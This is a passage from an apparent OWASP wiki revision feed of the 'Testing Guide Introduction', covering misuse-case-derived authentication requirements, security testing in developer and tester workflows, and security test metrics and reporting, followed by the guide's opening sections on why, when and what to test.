*Step 2: Describe the Negative Scenario:  Attacker breaks the authentication through a brute force/dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker to guess which accounts are actually valid, registered accounts (usernames). The attacker, then, will try to brute force the password for such a valid account. A brute force attack to four minimum length all digit passwords can succeed with a limited number of attempts (i.e., 10^4).&lt;br /&gt;
&lt;br /&gt;
*Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg]]&lt;br /&gt;
&lt;br /&gt;
*Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: &lt;br /&gt;
:1) Passwords need to be alphanumeric, lower and upper case and minimum of seven character length&lt;br /&gt;
:2) Accounts need to lockout after five unsuccessful login attempt&lt;br /&gt;
:3) Logon error messages need to be generic&lt;br /&gt;
These security requirements need to be documented and tested.&lt;br /&gt;
&lt;br /&gt;
===Security Tests Integrated in Developers' and Testers' Workflows===&lt;br /&gt;
'''Developers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that individual software components that they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executables. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.  Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated. &lt;br /&gt;
The validation of source code before integration in application builds is usually the responsibility of the senior developer. Such senior developer is also the subject matter expert in software security and his role is to lead the secure code review and make decisions whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking in the code changes into the application build.&lt;br /&gt;
&lt;br /&gt;
'''Testers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to Black box testing. In a gray box testing we can assume we have some partial knowledge about the session management of our application, and that should help us in understanding whether the logout and timeout functions are properly secured.&lt;br /&gt;
&lt;br /&gt;
The target for the security tests is the complete system that is the artifact that will be potentially attacked and includes both whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. &lt;br /&gt;
These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. &lt;br /&gt;
&lt;br /&gt;
Usually, testing engineers, rather then software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities, black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a pre-requisite that security test cases are documented in the security testing guidelines and procedures.&lt;br /&gt;
&lt;br /&gt;
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers/security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team in order to conduct such tests when a third party assessment is not required (such as for auditing purposes). &lt;br /&gt;
&lt;br /&gt;
Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team (e.g., the recommendations can include code, design, or configuration change). At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the developer team to fix all high risk vulnerabilities before the application could be deployed, unless such risks are acknowledged and accepted.&lt;br /&gt;
&lt;br /&gt;
===Developers' Security Tests===&lt;br /&gt;
'''Security Testing in the Coding Phase: Unit Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts such as functions, methods, classes, APIs, and libraries need to be functionally validated before being integrated into the application build. &lt;br /&gt;
&lt;br /&gt;
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. As testing activity following a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.  &lt;br /&gt;
&lt;br /&gt;
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:&lt;br /&gt;
* Authentication &amp;amp; Access Control&lt;br /&gt;
* Input Validation &amp;amp; Encoding&lt;br /&gt;
* Encryption&lt;br /&gt;
* User and Session Management&lt;br /&gt;
* Error and Exception Handling&lt;br /&gt;
* Auditing and Logging&lt;br /&gt;
&lt;br /&gt;
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as Junit, Nunit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.&lt;br /&gt;
&lt;br /&gt;
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being deallocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. &lt;br /&gt;
&lt;br /&gt;
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build.  Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.&lt;br /&gt;
&lt;br /&gt;
Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. &lt;br /&gt;
&lt;br /&gt;
Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control: software artifacts cannot be checked into the build with high or medium severity coding issues.&lt;br /&gt;
&lt;br /&gt;
===Functional Testers' Security Tests===&lt;br /&gt;
'''Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. &lt;br /&gt;
&lt;br /&gt;
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).&lt;br /&gt;
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective to test the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.&lt;br /&gt;
&lt;br /&gt;
The execution of security in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Since application security testing requires a specialized set of skills, which includes both software and security knowledge and is not typical of security engineers, organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so called “security test cases cheat list or check-list”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states, and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.&lt;br /&gt;
&lt;br /&gt;
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance tests environment (UAT) is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, valid SSL certificate and secure configuration, essential services disabled and web root directory not cleaned from test and administration web pages.&lt;br /&gt;
&lt;br /&gt;
===Security Test Data Analysis and Reporting===&lt;br /&gt;
'''Goals for Security Test Metrics and Measurements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The definition of the goals for the security testing metrics and measurements is a pre-requisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. &lt;br /&gt;
&lt;br /&gt;
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer number of vulnerabilities) when compared with the baseline.&lt;br /&gt;
&lt;br /&gt;
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and, finally, the cost to implement the fix.&lt;br /&gt;
&lt;br /&gt;
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. Such measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors and, further, by validating such vulnerability with penetration tests. The risk metrics associated to vulnerabilities found with security tests empower business management to make risk management decisions, such as to decide whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical).&lt;br /&gt;
&lt;br /&gt;
When evaluating the security posture of an application, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application with tests. One measure of application size is the number of line of code (LOC) of the application. Typically,  software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since testing can reduce the overall number by about 25% with one test alone, it is logical for larger size applications to be tested more and more often than smaller size applications.&lt;br /&gt;
&lt;br /&gt;
When security testing is done in several phases of the SDLC, the test data could prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced, and prove the effectiveness of removing them by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in lowering the cost of fixing the vulnerabilities, since it is less expensive to deal with the vulnerabilities when they are found (in the same phase of the SDLC), rather then fixing them later in another phase. &lt;br /&gt;
&lt;br /&gt;
Security test metrics can support security risk, cost, and defect management analysis when it is associated with tangible and timed goals such as: &lt;br /&gt;
*Reducing the overall number of vulnerabilities by 30%&lt;br /&gt;
*Security issues are expected to be fixed by a certain deadline (e.g., before beta release) &lt;br /&gt;
&lt;br /&gt;
Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews vs. penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. &lt;br /&gt;
&lt;br /&gt;
Security test data can also support specific objectives of the security analysis such as compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security costs vs. benefits analysis.&lt;br /&gt;
&lt;br /&gt;
When security test data is reported it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced as well the effectiveness of the process. &lt;br /&gt;
Some examples of clues supported by security test data can be:&lt;br /&gt;
*Are vulnerabilities reduced to an acceptable level for release?&lt;br /&gt;
*How does the security quality of this product compare with similar software products?&lt;br /&gt;
*Are all security test requirements being met? &lt;br /&gt;
*What are the major root causes of security issues?&lt;br /&gt;
*How numerous are security flaws compared to security bugs?&lt;br /&gt;
*Which security activity is most effective in finding vulnerabilities?&lt;br /&gt;
*Which team is more productive in fixing security defects and vulnerabilities?&lt;br /&gt;
*Which percentage of overall vulnerabilities are high risk?&lt;br /&gt;
*Which tools are most effective in detecting security vulnerabilities?&lt;br /&gt;
*Which kind of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box) tests?&lt;br /&gt;
*How many security issues are found during secure code reviews?&lt;br /&gt;
*How many security issues are found during secure design reviews?&lt;br /&gt;
&lt;br /&gt;
In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools should be used. Security tools can be qualified as being good at finding common known vulnerabilities targeting different artifacts.&lt;br /&gt;
The issue is that the unknown security issues are not tested: the fact that you come out clean it does not mean that your software or application is good. Some studies [22] have demonstrated that, at best, tools can find 45% of overall vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Even the most sophisticated automation tools are not a match for an experienced security tester: just relying on successful test results from automation tools will give security practitioners a false sense of security.  Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training.&lt;br /&gt;
&lt;br /&gt;
'''Reporting Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The security posture of an application can be characterized from the perspective of the effect, such as number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause (i.e., origin) such as coding errors, architectural flaws, and configuration issues.  &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities can be classified according to different criteria. This can be a statistical categorization, such as the OWASP Top 10 and WASC (Web Application Security Statistics) project, or related to defensive controls as in the case of WASF (Web Application Security Framework) categorization.&lt;br /&gt;
&lt;br /&gt;
When reporting security test data, the best practice is to include the following information, besides the categorization of each vulnerability by type:&lt;br /&gt;
*The security threat that the issue is exposed to&lt;br /&gt;
*The root cause of security issues (e.g., security bugs, security flaw)&lt;br /&gt;
*The testing technique used to find it&lt;br /&gt;
*The remediation of the vulnerability (e.g., the countermeasure) &lt;br /&gt;
*The risk rating of the vulnerability (High, Medium, Low)&lt;br /&gt;
&lt;br /&gt;
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. &lt;br /&gt;
&lt;br /&gt;
Reporting the root cause of the issue can help pinpoint what needs to be fixed: in the case of a white box testing, for example, the software security root cause of the vulnerability will be the offending source code. &lt;br /&gt;
&lt;br /&gt;
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).&lt;br /&gt;
&lt;br /&gt;
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and provide adequate references.&lt;br /&gt;
&lt;br /&gt;
Finally the risk rating helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves a risk analysis based upon factors such as impact and exposure.&lt;br /&gt;
&lt;br /&gt;
'''Business Cases'''&amp;lt;br&amp;gt; &lt;br /&gt;
For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders, such as project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has in terms of role and responsibility.&lt;br /&gt;
&lt;br /&gt;
Software developers look at security test data to show that software is coded more securely and efficiently, so that they can make the case of using source code analysis tools as well as following secure coding standards and attending software security training. &lt;br /&gt;
&lt;br /&gt;
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates and are getting better during tests. &lt;br /&gt;
&lt;br /&gt;
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. &lt;br /&gt;
&lt;br /&gt;
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. &lt;br /&gt;
&lt;br /&gt;
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), responsible for the budget that needs to be allocated in security resources, look for derivation of a cost/benefit analysis from security test data to make informed decisions on which security activities and tools to invest. One of the metrics that support such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and factor this gap with the cost of the security testing activity or the testing tools adopted.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] T. DeMarco, ''Controlling Software Projects: Management, Measurement and Estimation'', Yourdon Press, 1982&lt;br /&gt;
&lt;br /&gt;
[2] S. Payne, ''A Guide to Security Metrics'' - http://www.sans.org/reading_room/whitepapers/auditing/55.php&lt;br /&gt;
&lt;br /&gt;
[3] NIST, ''The economic impacts of inadequate infrastructure for software testing'' - http://www.nist.gov/public_affairs/releases/n02-10.htm&lt;br /&gt;
&lt;br /&gt;
[4] Ross Anderson, ''Economics and Security Resource Page'' - http://www.cl.cam.ac.uk/users/rja14/econsec.html &lt;br /&gt;
&lt;br /&gt;
[5] Denis Verdon, ''Teaching Developers To Fish'' - [[OWASP AppSec NYC 2004]]&lt;br /&gt;
&lt;br /&gt;
[6] Bruce Schneier, ''Cryptogram Issue #9'' - http://www.schneier.com/crypto-gram-0009.html&lt;br /&gt;
&lt;br /&gt;
[7] Symantec, ''Threat Reports'' -  http://www.symantec.com/business/theme.jsp?themeid=threatreport&lt;br /&gt;
&lt;br /&gt;
[8] FTC, ''The Gramm-Leach Bliley Act'' - http://www.ftc.gov/privacy/privacyinitiatives/glbact.html&lt;br /&gt;
&lt;br /&gt;
[9] Senator Peace and Assembly Member Simitian, ''SB 1386''- http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html&lt;br /&gt;
&lt;br /&gt;
[10] European Union, ''Directive 96/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data'' -&lt;br /&gt;
http://ec.europa.eu/justice_home/fsj/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf&lt;br /&gt;
&lt;br /&gt;
[11] NIST, '' Risk management guide for information technology systems'' - http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;br /&gt;
&lt;br /&gt;
[12] SEI, Carnegie Mellon, ''Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)'' - http://www.cert.org/octave/&lt;br /&gt;
&lt;br /&gt;
[13] Ken Thompson, ''Reflections on Trusting Trust, Reprinted from Communication of the ACM '' - http://cm.bell-labs.com/who/ken/trust.html''   [[Category:FIXME|link not working]]&lt;br /&gt;
&lt;br /&gt;
[14] Gary McGraw, ''Beyond the Badness-ometer'' - http://www.ddj.com/security/189500001&lt;br /&gt;
&lt;br /&gt;
[15] FFIEC, '' Authentication in an Internet Banking Environment'' - http://www.ffiec.gov/pdf/authentication_guidance.pdf&lt;br /&gt;
&lt;br /&gt;
[16] PCI Security Standards Council, ''PCI Data Security Standard'' -https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml &lt;br /&gt;
&lt;br /&gt;
[17] MSDN, ''Cheat Sheet: Web Application Security Frame'' - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe &lt;br /&gt;
&lt;br /&gt;
[18] MSDN, ''Improving Web Application Security, Chapter 2, Threat And Countermeasures'' - http://msdn.microsoft.com/en-us/library/aa302418.aspx&lt;br /&gt;
&lt;br /&gt;
[19] Gil Regev, Ian Alexander,Alain Wegmann, ''Use Cases and Misuse Cases Model the Regulatory Roles of Business Processes'' - http://easyweb.easynet.co.uk/~iany/consultancy/regulatory_processes/regulatory_processes.htm&lt;br /&gt;
&lt;br /&gt;
[20] Sindre,G. Opdmal A., '' Capturing Security Requirements Through Misuse Cases ' - http://folk.uio.no/nik/2001/21-sindre.pdf&lt;br /&gt;
&lt;br /&gt;
[21] Security Across the Software Development Lifecycle Task Force, ''Referred Data from Caper Johns, Software Assessments, Benchmarks and Best Practices'' -http://www.cyberpartnership.org/SDLCFULL.pdf&lt;br /&gt;
&lt;br /&gt;
[22] MITRE, ''Being Explicit About Weaknesses, Slide 30, Coverage of CWE'' -http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&lt;br /&gt;
&lt;br /&gt;
[23] Marco Morana, ''Building Security Into The Software Life Cycle, A Business Case'' - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62230</id>
		<title>Testing Guide Introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62230"/>
				<updated>2009-05-27T12:37:48Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security Test Data Analysis and Reporting */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
=== The OWASP Testing Project ===&lt;br /&gt;
----&lt;br /&gt;
The OWASP Testing Project has been in development for many years. With this project, we wanted to help people understand the ''what'', ''why'', ''when'', ''where'', and ''how'' of testing their web applications, and not just provide a simple checklist or prescription of issues that should be addressed. The outcome of this project is a complete Testing Framework, from which others can build their own testing programs or qualify other people’s processes. The Testing Guide describes in details both the general Testing Framework and the techniques required to implement the framework in practice.&lt;br /&gt;
&lt;br /&gt;
Writing the Testing Guide has proven to be a difficult task. It has been a challenge to obtain consensus and develop the content that allows people to apply the concepts described here, while enabling them to work in their own environment and culture. It has also been a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. &lt;br /&gt;
&lt;br /&gt;
However, we are very satisfied with the results we have reached. Many industry experts and those responsible for software security at some of the largest companies in the world are validating the Testing Framework. This framework helps organizations test their web applications in order to build reliable and secure software, rather than simply highlighting areas of weakness, although the latter is certainly a byproduct of many of OWASP’s guides and checklists. As such, we have made some hard decisions about the appropriateness of certain testing techniques and technologies, which we fully understand will not be agreed upon by everyone. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.&lt;br /&gt;
&lt;br /&gt;
The rest of this guide is organized as follows. This introduction covers the pre-requisites of testing web applications: the scope of testing, the principles of successful testing, and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Measuring (in)security: the Economics of Insecure Software'''&amp;lt;br&amp;gt;&lt;br /&gt;
A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. We will not cover this topic in detail here, since it would take a guide on its own (for an introduction, see [2]). &lt;br /&gt;
&lt;br /&gt;
One aspect that we want to emphasize, however, is that security measurements are, by necessity, about both the specific, technical issues (e.g., how prevalent a certain vulnerability is) and how these affect the economics of software. We find that most technical people understand at least the basic issues, or have a deeper understanding, of the vulnerabilities. Sadly, few are able to translate that technical knowledge into monetary terms, and, thereby, quantify the potential cost of vulnerabilities to the application owner's business. We believe that until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.&amp;lt;br/&amp;gt;&lt;br /&gt;
While estimating the cost of insecure software may appear a daunting task, recently there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.&lt;br /&gt;
&lt;br /&gt;
The framework described in this document encourages people to measure security throughout their entire development process. They can then relate the cost of insecure software to the impact it has on their business, and consequently develop appropriate business decisions (resources) to manage the risk. Remember: measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.&lt;br /&gt;
&lt;br /&gt;
'''What is Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
What do we mean by testing? During the development life cycle of a web application, many things need to be tested. The Merriam-Webster Dictionary describes testing as: &lt;br /&gt;
* To put to test or proof. &lt;br /&gt;
* To undergo a test. &lt;br /&gt;
* To be assigned a standing or evaluation based on tests. &lt;br /&gt;
For the purposes of this document, testing is a process of comparing the state of a system/application against a set of criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor complete. For this reason and others, many outsiders regard security testing as a black art. This document’s aim is to change that perception and to make it easier for people without in-depth security knowledge to make a difference. &lt;br /&gt;
&lt;br /&gt;
'''Why Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that they need to undertake to build and operate that testing program on their web applications. It is intended to give a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference and as a methodology to help determine the gap between your existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, understand the magnitude of resources required to test and maintain their software, or prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review will be covered in the remaining parts of this document. &lt;br /&gt;
&lt;br /&gt;
'''When to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
Most people today don’t test the software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artifacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:SDLC.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 1: Generic SDLC Model'' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. &lt;br /&gt;
&lt;br /&gt;
'''What to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that &amp;quot;create&amp;quot; software, then it is logical that these are the factors that must be tested. Today most people generally test the technology or the software itself. &lt;br /&gt;
&lt;br /&gt;
An effective testing program should have components that test ''People'' – to ensure that there is adequate education and awareness; ''Process'' – to ensure that there are adequate policies and standards and that people know how to follow these policies; ''Technology'' – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at [http://www.fnf.com Fidelity National Financial] presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: &amp;quot;If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.&amp;quot; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Feedback and Comments'''&amp;lt;br&amp;gt;&lt;br /&gt;
